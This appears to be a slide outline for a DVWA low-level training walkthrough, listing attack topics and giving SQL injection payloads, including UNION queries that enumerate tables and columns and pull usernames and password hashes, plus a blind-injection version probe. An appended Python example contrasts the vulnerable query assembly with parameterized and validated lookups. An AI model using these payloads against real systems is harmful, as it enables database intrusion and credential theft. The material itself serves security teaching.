Dvwa low level

Published in: Technology

  1. DVWA - Damn Vulnerable Web Application: DVWA low level
  2. 1. Brute Force
  3. 2. Command Injection
  4. 3. CSRF
  5. 4. File Inclusion
  6. 5. SQL Injection
  7. SQL Injection Source
  8. SQL query assembly
     $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
     Test whether there is an error:
     1' and 1=1#
     After combining, it becomes:
     "select first_name,last_name from users where user_id = '1' and 1=1#";
  9. 5. SQL Injection
     1' order by 1#
     1' union all select 1,2#
     1' union all select user(),database()#
     1' union all select null,table_name from information_schema.tables#
     1' union all select null,table_name from information_schema.tables where table_schema = 'dvwa'#
     1' union all select null,column_name from information_schema.columns where table_schema ='dvwa'#
  10. 5. SQL Injection
     1' union all select user,password from users#
  11. 6. Blind SQL Injection: the difference
  12. 6. Blind SQL Injection
     We can first check the version:
     1' union all select null,substring(@@version,1,1)=4#
  13. 7. File Upload
  14. 8. Reflected Cross Site Scripting (XSS)
  15. 9. Stored Cross Site Scripting (XSS)
  16. DVWA medium level: to be continued. vance@hst.tw
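
The query assembly from slide 8 next to a parameterized form, as an added example that is not part of the original slides. It uses Python with an in-memory SQLite table rather than DVWA's PHP and MySQL; the function names and sample rows are assumptions constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample table; column names follow the query on slide 8."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown")],  # constructed rows
    )
    return db


def assemble_vulnerable(user_input):
    """Mirror of the slide's interpolation: the input becomes part of the SQL text.

    Only the string is built here (it is not executed), to show that the quote
    in the input closes the literal and the rest is parsed as SQL. In MySQL the
    trailing quote is then discarded by the '#' comment.
    """
    return (
        "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_input
    )


def lookup_parameterized(db, user_input):
    """Bound parameter: the value travels separately from the SQL text."""
    cur = db.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_input,)
    )
    return cur.fetchall()


def lookup_validated(db, user_input):
    """Defense in depth: user_id is numeric, so reject anything but ASCII digits."""
    if not (user_input.isascii() and user_input.isdigit()):
        raise ValueError("user_id must be an integer")
    return lookup_parameterized(db, int(user_input))


if __name__ == "__main__":
    db = make_db()
    probe = "1' and 1=1#"  # the test input from slide 8
    print(assemble_vulnerable(probe))       # input has changed the query structure
    print(lookup_parameterized(db, probe))  # [] : compared as one literal value
    print(lookup_validated(db, "1"))        # [('admin', 'admin')]
```

With the bound parameter, the slide's test input is compared against `user_id` as a single value and matches no row, so the query structure cannot be altered by the input.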